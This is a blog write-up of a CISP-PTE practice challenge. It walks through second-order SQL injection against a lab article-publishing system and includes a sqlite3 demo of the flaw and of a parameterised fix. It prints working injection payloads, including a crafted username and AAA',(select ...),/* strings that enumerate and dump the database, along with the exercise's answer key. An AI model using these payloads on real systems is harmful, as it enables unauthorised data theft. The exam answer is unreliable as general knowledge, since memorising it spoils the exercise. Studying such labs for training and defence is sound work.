SQL injection of cisp-pte (Application of secondary injection)
2022-07-05 16:42:00 【Colorful @ star】
CISP-PTE practical exercises: SQL injection
Preface
I haven't posted an article for a long time, because I have been preparing for the CISP-PTE exam and stepping up my practice. Recently I found that SQL injection is also a classic question type for secondary injection, so I would like to share my method for solving these questions.
I. Practical exercise: SQL injection
Because this SQL injection question is rather involved and the explanation is long, I will write up just this one SQL injection question in this article first; explanations of new question types will be updated later.
II. Problem-solving steps and methods
1. Finding the approach

From the wording of the question, the answer is in the database; we just need to find a breakthrough, inject our statements, and get the answer. Let's click in and take a look.
We find that it is an article publishing system. Let's try logging in once with a weak password.

Login failed, so all I can do is register and have a look.
I registered a user hao with password 123 and found that registration works.
After logging in, we can see articles published earlier. Now let's try publishing an article to see whether there is an injection point.
After filling in the data, it is inserted successfully.
Let's insert some garbled characters and symbols to see what happens.
When we insert single quotes and comment characters, an error is returned, which indicates an injection point. Next, insert SQL statements to inject.
2. Performing the SQL statement injection
At this point we need to work out which injection method is suitable. Looking at the question stem, I found that '--' and '#' are filtered, the field cannot be filled in directly, and no database information is displayed after submission. This is when we think of secondary injection to get the SQL query statement in. The principle and method of secondary injection were explained in an earlier post in the penetration-testing column; you can look back at it.
(1) First register two accounts. In my example they are hao and */'hao')#, both with password 123.
The principle is as shown in the picture:
The injection is completed by secondary injection plus semi-closing the statement. First, as the user */'1234ewq');#, insert the article content through the browser; the POCs are as follows:
AAA',(select database()),/*
AAA',(select group_concat(table_name) from information_schema.tables where table_schema like 0x32776562),/*
AAA',(select group_concat(column_name) from information_schema.columns where table_schema like 0x32776562 and table_name like 0x61727469636C6531),/*
AAA',(select group_concat(content) from (select * from article1 limit 0,1) as a),/*
Then switch back to the normal user 1234ewq.
Here is the explanation: /* ... */ is used to comment out the extra quotes, so that the select statement we insert can be displayed. Secondly, because the secondary-injection user is */'1234ewq');#, the username finally inserted into the table is actually 1234ewq, so the result has to be viewed as the normal user.
Let's see the effect.
Difficulties in the exploitation:
First, the comment characters # and -- are blocked, but they are not blocked at registration time. Because of a MySQL characteristic, everything between /* and */ is commented out, and the insert into <table> value() form requires the fields to be filled in one by one: one field too many is not allowed, and neither is one too few. Also, only the 2nd and 3rd fields can be displayed. Therefore, first register a secondary-injection username, then, with the help of secondary injection, insert that username into the statement for special handling, forming
insert article1 value('','AAA',(select database()),/*','','*/ '1234ewq');#')
In this way, what is inserted into the database becomes
insert article1 value('','AAA',(select database()), '1234ewq')
Second, when querying the fields after insertion, using the same table name article1 inside a query on article1 makes the database loop and report an error, so an alias with as is needed. And if a limit clause is not added, nothing can be exported; limit can take any value.
The above is a detailed solution found online, to help everyone understand. Now let me explain my own method.
First log in with the account */'hao')#. The principle of registering such an account is very clear: it simply comments out the quotation marks and commas before and after it.
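As an added illustration (not part of the original write-up), the following sqlite3 sketch models why a username accepted at registration time becomes an injection point when the article system later concatenates it into a new INSERT, and what the parameterised fix looks like. It assumes a users/article1 schema like the one inferred above and uses an in-memory sqlite3 database instead of the challenge's MySQL, so MySQL's "#" comment is not modelled, only the quote-closing.

```python
import sqlite3

# Constructed mini-version of the article system (assumption: a users table and
# an article1 table with id, title, content, author), not the challenge's code.
def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE article1 (id INTEGER PRIMARY KEY, title TEXT, content TEXT, author TEXT)")
    return conn

def register(conn, username, password):
    # Registration is parameterised, so ANY username is stored verbatim. The filter on
    # '#' / '--' applied at publish time never sees it: this is the seed of secondary injection.
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    conn.commit()

def publish_vulnerable(conn, user_id, title, content):
    # The stored username is trusted as "already in the database" and concatenated back
    # into a fresh statement: a second-order injection point.
    (username,) = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    sql = "INSERT INTO article1 VALUES (NULL,'%s','%s','%s')" % (title, content, username)
    conn.execute(sql)  # with a quote-bearing username the statement structure is altered
    conn.commit()
    return sql

def publish_safe(conn, user_id, title, content):
    # Hardened form: the stored value travels as a bound parameter, never as SQL text.
    (username,) = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    conn.execute("INSERT INTO article1 VALUES (NULL, ?, ?, ?)", (title, content, username))
    conn.commit()
    return conn.execute("SELECT author FROM article1 ORDER BY id DESC LIMIT 1").fetchone()[0]

def demo():
    conn = setup()
    register(conn, "*/'hao')#", "123")  # the username used in the write-up
    results = {}
    try:
        publish_vulnerable(conn, 1, "AAA", "body")
        results["vulnerable"] = "executed"
    except sqlite3.OperationalError as e:
        # the stored quote closes the literal early: the "error on single quote" seen above
        results["vulnerable"] = "syntax error: %s" % e
    results["safe_author"] = publish_safe(conn, 1, "AAA", "body")
    return results

if __name__ == "__main__":
    print(demo())
```

The safe variant stores the odd username as plain data, which is the behaviour that removes the secondary-injection point regardless of what the first-order filter blocks.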
(2) After logging in, we publish an article; the next step is to submit the SQL statements. Because the submission here is invisible, it is in fact submitted into the hao account.
(3) Manual SQL injection method
select schema_name from information_schema.schemata (check the databases)
select table_name from information_schema.tables where table_schema=<database name> (check the tables)
select column_name from information_schema.columns where table_name=<table name> (check the columns)
select <column name> from <database name>.<table name> (check the data)
First check which databases there are.
Inserted successfully.
Look at the tables in the database.
Inserted successfully.
At this point, from the result of the insert, we can see the article1 table.
Next, let's look at the fields in the table.

These are the fields in the table. The answer is most likely in title or content, so we start checking the data and output all of it.

We can see that the answer is in the content field, and not in the first row but in some arbitrary row, so try a few more rows with limit.
The answer is :key1:u9y8tr4n
Summary
That concludes this SQL injection problem. I hope you take a good look at the problem-solving ideas and the method of secondary injection. Next time I will update with more CISP-PTE practical exercises for everyone.